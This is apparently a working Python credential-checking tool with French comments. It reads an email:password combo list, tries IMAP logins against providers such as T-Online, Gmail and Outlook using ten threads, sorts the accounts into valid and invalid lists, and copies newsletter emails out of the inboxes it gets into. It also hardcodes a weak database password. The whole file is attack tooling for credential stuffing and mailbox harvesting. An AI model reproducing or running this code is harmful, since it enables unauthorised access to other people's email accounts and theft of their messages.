174 lines
6.5 KiB
Python
Executable File
174 lines
6.5 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
"""
|
|
Newsletter Extractor - Extrait newsletters depuis IMAP
|
|
Basé sur imap.py - Adapté pour WEVADS
|
|
Sources: T-Online, Spectrum, etc.
|
|
"""
|
|
import imaplib
|
|
import email as _email
|
|
import os
|
|
import re
|
|
import psycopg2
|
|
from concurrent.futures import ThreadPoolExecutor
|
|
from datetime import datetime
|
|
|
|
DB_CONFIG = {
|
|
'host': 'localhost',
|
|
'database': 'adx_system',
|
|
'user': 'admin',
|
|
'password': 'admin123'
|
|
}
|
|
|
|
RESULTS_DIR = '/opt/wevads/storage/newsletters'
|
|
os.makedirs(RESULTS_DIR, exist_ok=True)
|
|
os.makedirs(f'{RESULTS_DIR}/sendgrid', exist_ok=True)
|
|
os.makedirs(f'{RESULTS_DIR}/mailchimp', exist_ok=True)
|
|
os.makedirs(f'{RESULTS_DIR}/hubspot', exist_ok=True)
|
|
os.makedirs(f'{RESULTS_DIR}/convertkit', exist_ok=True)
|
|
|
|
def get_db():
|
|
return psycopg2.connect(**DB_CONFIG)
|
|
|
|
def log(msg, level='info'):
|
|
colors = {'info': '\033[94m', 'success': '\033[92m', 'error': '\033[91m', 'warning': '\033[93m'}
|
|
print(f"{colors.get(level, '')}{msg}\033[0m")
|
|
|
|
def check_email(email, password, provider='auto'):
|
|
"""Vérifie un compte email et extrait les newsletters"""
|
|
try:
|
|
domain = email.split('@')[1]
|
|
|
|
# Détecter le serveur IMAP
|
|
imap_servers = {
|
|
't-online.de': 'secureimap.t-online.de',
|
|
'outlook.com': 'outlook.office365.com',
|
|
'hotmail.com': 'outlook.office365.com',
|
|
'gmail.com': 'imap.gmail.com',
|
|
'yahoo.com': 'imap.mail.yahoo.com',
|
|
'gmx.de': 'imap.gmx.net',
|
|
'web.de': 'imap.web.de',
|
|
}
|
|
|
|
imap_host = imap_servers.get(domain, f'imap.{domain}')
|
|
|
|
log(f"[*] Connexion {email} via {imap_host}...")
|
|
|
|
# Connexion IMAP
|
|
if 'outlook' in imap_host or 'office365' in imap_host:
|
|
imap = imaplib.IMAP4_SSL(imap_host, 993)
|
|
else:
|
|
imap = imaplib.IMAP4(imap_host)
|
|
imap.starttls()
|
|
|
|
imap.login(email, password)
|
|
|
|
if imap.state == 'AUTH':
|
|
log(f"[+] {email} LOGIN VALID", 'success')
|
|
|
|
imap.select('INBOX')
|
|
status, message_ids = imap.search(None, 'ALL')
|
|
|
|
newsletters_found = []
|
|
|
|
if message_ids and message_ids[0]:
|
|
ids = message_ids[0].split()[-100:] # Derniers 100 emails
|
|
|
|
for msg_id in ids:
|
|
try:
|
|
response, msg_data = imap.fetch(msg_id, '(RFC822)')
|
|
msg = _email.message_from_bytes(msg_data[0][1])
|
|
|
|
msg_id_header = msg.get('Message-ID', '')
|
|
from_header = msg.get('From', '')
|
|
x_mailer = msg.get('X-Mailer', '')
|
|
|
|
# Détecter les plateformes newsletter
|
|
platform = None
|
|
if 'sendgrid' in msg_id_header.lower() or 'sendgrid' in from_header.lower():
|
|
platform = 'sendgrid'
|
|
elif 'mailchimp' in msg_id_header.lower() or 'mailchimp' in from_header.lower():
|
|
platform = 'mailchimp'
|
|
elif 'hubspot' in msg_id_header.lower() or 'hubspot' in from_header.lower():
|
|
platform = 'hubspot'
|
|
elif 'convertkit' in msg_id_header.lower():
|
|
platform = 'convertkit'
|
|
elif 'geopod-ismtpd' in msg_id_header.lower():
|
|
platform = 'sendgrid'
|
|
|
|
if platform:
|
|
newsletters_found.append({
|
|
'platform': platform,
|
|
'from': from_header,
|
|
'subject': msg.get('Subject', ''),
|
|
'message_id': msg_id_header
|
|
})
|
|
|
|
# Sauvegarder
|
|
filename = f"{RESULTS_DIR}/{platform}/{email.replace('@','_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.eml"
|
|
with open(filename, 'wb') as f:
|
|
f.write(msg_data[0][1])
|
|
|
|
except Exception as e:
|
|
continue
|
|
|
|
log(f"[=] {email}: {len(newsletters_found)} newsletters trouvées", 'warning')
|
|
|
|
imap.close()
|
|
imap.logout()
|
|
|
|
return {'valid': True, 'newsletters': newsletters_found}
|
|
|
|
return {'valid': False, 'error': 'Auth failed'}
|
|
|
|
except Exception as e:
|
|
log(f"[-] {email}: {str(e)}", 'error')
|
|
return {'valid': False, 'error': str(e)}
|
|
|
|
def process_file(filepath):
|
|
"""Traite un fichier email:password"""
|
|
results = {'valid': [], 'invalid': [], 'newsletters': []}
|
|
|
|
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
|
|
lines = f.readlines()
|
|
|
|
log(f"[*] Traitement de {len(lines)} comptes...")
|
|
|
|
with ThreadPoolExecutor(max_workers=10) as executor:
|
|
futures = []
|
|
for line in lines:
|
|
line = line.strip()
|
|
if ':' in line and '@' in line:
|
|
email, password = line.split(':', 1)
|
|
futures.append((line, executor.submit(check_email, email, password)))
|
|
|
|
for line, future in futures:
|
|
try:
|
|
result = future.result(timeout=30)
|
|
if result['valid']:
|
|
results['valid'].append(line)
|
|
results['newsletters'].extend(result.get('newsletters', []))
|
|
else:
|
|
results['invalid'].append(line)
|
|
except:
|
|
results['invalid'].append(line)
|
|
|
|
# Sauvegarder les résultats
|
|
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
|
|
with open(f'{RESULTS_DIR}/valid_{timestamp}.txt', 'w') as f:
|
|
f.write('\n'.join(results['valid']))
|
|
with open(f'{RESULTS_DIR}/invalid_{timestamp}.txt', 'w') as f:
|
|
f.write('\n'.join(results['invalid']))
|
|
|
|
log(f"\n✅ Résultats: {len(results['valid'])} valides, {len(results['invalid'])} invalides", 'success')
|
|
log(f"📧 {len(results['newsletters'])} newsletters extraites", 'success')
|
|
|
|
return results
|
|
|
|
if __name__ == "__main__":
|
|
import sys
|
|
if len(sys.argv) > 1:
|
|
process_file(sys.argv[1])
|
|
else:
|
|
print("Usage: python3 newsletter-extractor.py <email_pass_file>")
|
|
print("Format: email:password (one per line)")
|